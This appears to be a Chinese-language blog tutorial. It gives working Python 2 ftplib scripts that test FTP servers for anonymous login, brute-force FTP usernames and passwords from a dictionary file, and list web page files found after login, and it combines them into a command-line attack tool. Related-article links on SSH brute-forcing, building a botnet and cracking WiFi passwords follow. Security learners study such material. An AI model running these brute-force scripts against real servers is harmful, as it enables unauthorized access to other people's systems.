目录

判断FTP服务器是否允许匿名登录

暴力破解FTP口令

列出FTP目录内的网页文件

综合

环境:Windows python2.7.15

ftplib模块是python下用于ftp服务的模块 。

判断FTP服务器是否允许匿名登录

以下代码是判断FTP服务器是否允许匿名登录

我们写了一个anonLogin() 函数,使用 ftp.login()方法进行匿名登录,如果没有抛出异常,说明FTP服务器允许匿名登录。反之不允许。

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 10:25:17 2018

@author: 小谢

"""

import ftplib

def anonLogin(hostname):

    try:

        ftp=ftplib.FTP(hostname)       #实例化FTP连接

        ftp.login('anonymous','')      #匿名登录

        print '\n[*] '+hostname+' FTP Anonymous Login Succeeded!'

        ftp.quit()                    #退出FTP

        return True

    except Exception,e:               #如果捕获到异常,说明不允许匿名登录

        print '\n[-] '+str(hostname)+' FTP Anonymous Login Failed!'

        return False

anonLogin('127.0.0.1')

暴力破解FTP口令

如果ftp服务器不允许匿名登录呢,我们就需要通过密码字典暴力破解ftp口令。我们通过读取密码字典中的用户名和口令,一个一个去尝试登录,如果没捕获到异常,说明用户名和口令正确!密码字典中用户名和口令用 : 分隔。

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 10:36:49 2018

@author: 小谢

"""

import ftplib

def bruteLogin(hostname,passwdFile):

    f=open(passwdFile,'r')

    lines=f.readlines()

    for line in lines:

        user=line.split(":")[0]    #用户名

        passwd=line.split(":")[1].strip("\n")  #密码

        print '[+] Trying: '+user+": "+passwd

        try:

            ftp=ftplib.FTP(hostname)          #实例化FTP连接

            ftp.login(user,passwd)            #登录

            print '\n[*] '+hostname +' FTP Login Succeeded!'

            ftp.quit()       #退出FTP

            return(user,passwd)      #返回用户名和密码

        except Exception,e:

            pass

    print '\n[-] Could not brute force FTP credentials!'

    return(None,None)

a=bruteLogin("127.0.0.1","key.txt")

print("User:%s Password:%s"%a)

列出FTP目录内的网页文件

在得到了用户名和口令之后,我们就可以列出FTP目录下的文件,看是否存在网页文件。注意,我们这里只能判断FTP目录这一级的文件,而不能递归的判断目录内的文件。因为我们只知道FTP目录的相对路径,而不知道绝对路径!

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 10:51:13 2018

@author: 小谢

"""

import ftplib

import os

def returnDefault(ftp):

    try:

        dirList=ftp.nlst()   #列出FTP目录下的文件或目录

    except:

        dirList=[]

        print '[-] Could not list directory contents!'

        return

    retList=[]

    for filename in dirList:

        fn=filename.lower()        #将目录名转换为小写

        if '.php' in fn or '.html' in fn or '.asp' in fn or '.jsp' in fn or '.htm' in fn:

            print'[+] Found default page:'+filename

            retList.append(filename)

    return retList

def main():

    ftp=ftplib.FTP("127.0.0.1")   #实例化FTP连接

    ftp.login("admin","root")

    a=returnDefault(ftp)

    if a:

        print("Defalut Page List:")

        for i in a:

            print(i)

main()

综合

我们可以结合前面三个脚本,写一个汇总的脚本。当用户执行脚本的时候,没加 -F/-f 参数指定密码字典的时候,就默认查看FTP服务器是否可匿名登录,如果可匿名登录,则列出FTP目录下的网页文件。如果不能匿名登录,就提示不能匿名登录。当指定了-F/-f 参数的话,就暴力破解 FTP 口令,如果破解成功了,则列出FTP目录下是的网页文件。

# -*- coding: utf-8 -*-

"""

Created on Sun Nov  4 12:12:41 2018

@author: 小谢

"""

import parser

import optparse

import ftplib

def anonLogin(hostname):     #验证是否可匿名登录

    try:

        ftp=ftplib.FTP(hostname)

        ftp.login('','')  #匿名登录

        print '\n[*] '+hostname +' FTP Anonymous Login Succeeded!'

        return (True,ftp)

    except:

        print '\n[-] '+str(hostname)+' FTP Anonymous Login Failed!'

        return (False,ftp)

def bruteLogin(hostname,passwdFile):  #暴力破解

    f=open(passwdFile,'r')

    lines=f.readlines()

    for line in lines:

        user=line.split(":")[0]                #用户名

        passwd=line.split(":")[1].strip("\n")  #密码

        try:

            ftp=ftplib.FTP(hostname)

            ftp.login(user,passwd)

            print '\n[*] '+hostname +' FTP Login Succeeded!'

            print("User:%s Password:%s"%(user,passwd))

            return(True,ftp)

        except Exception,e:

            pass

    print '\n[-] Could not brute force FTP credentials!'

    return(False,ftp)

def returnDefault(ftp):     #列出FTP目录下的网页文件

    try:

        dirList=ftp.nlst()   #列出FTP目录下的文件或目录

    except Exception,e:

        print e

        print '[-] Could not list directory contents!'

        return

    retList=[]

    for filename in dirList:

        fn=filename.lower()        #将目录名转换为小写

        if '.php' in fn or '.html' in fn or '.asp' in fn or '.jsp' in fn or '.htm' in fn:

            print'[+] Found default page:'+filename

            retList.append(filename)

    return retList

def main():

    usage="python %prog -H <target host> -F/f <password file>"  #显示文件的用法帮助信息

    parser=optparse.OptionParser(usage)   #实例化一个对象

    parser.add_option('-H',dest='Host',type='string',help='target host')

    parser.add_option('-f','-F',dest='File',type='string',help='target host')

    (options,args)=parser.parse_args()

    Host=options.Host

    File=options.File

    if Host==None:

        print(parser.usage)

        exit(0)

    if File==None:

        a=anonLogin(Host)

        if a[0]:

            returnDefault(a[1])

    else:

        b=bruteLogin(Host,File)

        if b[0]:

            returnDefault(b[1])

    return

if __name__=="__main__":

    main()

Python脚本暴力破解FTP口令(ftplib)的更多相关文章

  1. Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)

    目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 ...

  2. [小技巧] Python 脚本暴力破解 HC2600 机顶盒管理密码

    家里最近接入了广电有线电视,配了三个创维 HC2600 机顶盒,并且每个机顶盒还带有无线路由器功能. 免费赠送 Internet 接入服务倒也没什么,不过机顶盒内置的 WIFI 实在有点寒酸:只支持 ...

  3. 暴力破解FTP服务器技术探讨与防范措施

    暴力破解FTP服务器技术探讨与防范措施 随着Internet的发展出现了由于大量傻瓜化黑客工具任何一种黑客攻击手段的门槛都降低了很多但是暴力破解法的工具制作都已经非常容易大家通常会认为暴力破解攻击只是 ...

  4. XAMPP、PHPstorm和PHPcharm和Windows环境下Python搭建+暴力破解

    XAMPP的安装和使用 一.什么是XAMPP? XAMPP是最流行的PHP开发环境. XAMPP是完全免费且易于安装的Apache发行版,其中包含Apache.MariaDB.PHP和Perl. 类似 ...

  5. Python脚本自动化破解大白鲨摄像头(Shodan)

    关于本文的技术知识点,Shodan模块的用法,传送门-->  Python中shadon模块的使用    Shodan的使用 今天我们要利用python进行自动化破解的摄像头叫大白鲨摄像头,他的 ...

  6. Python最新暴力破解WiFi,攻破所有密码限制,最强破解!

    暴力破解wifi密码 这个代码也是非常简单,这里需要用Python中的pywifi这个库,所以需要在DOS命令下安装这个库,同样使用pip install pywifi,很简单就安装成功了,我用的是P ...

  7. python 编写暴力破解mysql用户名密码

    本文摘自别人的,自己运行调试了一下#!/user/bin/env python#-*- coding:utf-8 -*- import pymysql#导入连接数据库的模块import sys cla ...

  8. Fast RDP Brute暴力破解3389口令

    http://www.tuicool.com/articles/b67rQfr 下载地址:https://www.rekings.com/fast-rdp-brute-gui-v2-0/

  9. python实现暴力破解

    import urllib2 import urllib import cookielib import threading import sys import Queue from HTMLPars ...

随机推荐

  1. HTML5基础入门一天学完

    HTML 什么是HTML HTML:Hyper Text Markup Language(超文本编辑语言) HTML的发展史 HTML5优势 世界知名浏览器厂商对HTML5的支持 市场的需求 跨平台 ...

  2. 200-Java语言基础-Java编程入门-004 | Java分支与循环

    一.流程控制语句 可以控制程序的执行流程 在程序开发的过程之中一共会存在有三种程序逻辑:顺序结构.条件分支(选择)结构.循环结构. 顺序结构的定义,即:所有的程序将按照定义的代码从上往下.顺序依次执行 ...

  3. 爬虫必知必会(4)_异步协程-selenium_模拟登陆

    一.单线程+多任务异步协程(推荐) 协程:对象.可以把协程当做是一个特殊的函数.如果一个函数的定义被async关键字所修饰.该特殊的函数被调用后函数内部的程序语句不会被立即执行,而是会返回一个协程对象 ...

  4. .net 程序员的centos命令总结

    1,ssh相关 在初始化一台云服务器的时候,第一件事情就是去把该关的门都关上,首先第一关就是禁用root登录,禁用密码登录,顺便改一下远程登录端口,让登录都通过ssh密钥对来进行,阿里云里有密钥对管理 ...

  5. 练习使用Unicorn、Capstone

    Unicorn是一个轻量级的多平台,多体系结构的CPU仿真器框架.官网:http://www.unicorn-engine.org/ Capstone是一个轻量级的多平台,多体系结构的反汇编框架.官网 ...

  6. 回忆那些年我玩过的ide,看看哪些你也玩过,看图回忆

    闲来无聊,回忆一下这些年玩过的ide.看看哪些你也玩过. QBasic 第一个ide,兴奋程度也是最大的,从此进入了码农行列 VisualBasic 可以拖界面了,成就感爆棚 Turbo C c语言, ...

  7. Java学习之数组的简单用法

    •概念 其实所谓的数组指的就是一组相关类型的变量集合,并且这些变量可以按照统一的方式进行操作. 数组本身属于引用数据类型,那么既然是引用数据类型,这里面实际又会牵扯到内存分配: 而数组的定义语法有两种 ...

  8. 《环形队列》游戏高《TPS》模式下减少cpu线程切换

    序言 什么高TPS?QPS,其实很多人都知道,还有人说大数据,大流量这些关键词夜以继日的出现在我们眼前: 针对高TPS,QPS这些词汇还有一个次可能比较陌生那就是CCU,tps,qps接受满天飞,CC ...

  9. [单调栈]Imbalanced Array

    I m b a l a n c e d A r r a y Imbalanced Array ImbalancedArray 题目描述 You are given an array a a a con ...

  10. Web协议详解与抓包实战,高效解决网络难题

    无论你是前后端工程师,还是运维测试,如果想面试更高的职位,或者要站在更高的角度去理解技术业务架构,并能在问题出现时快速.高效地解决问题,Web 协议一定是你绕不过去的一道坎. 旨在帮助你对各种常用 W ...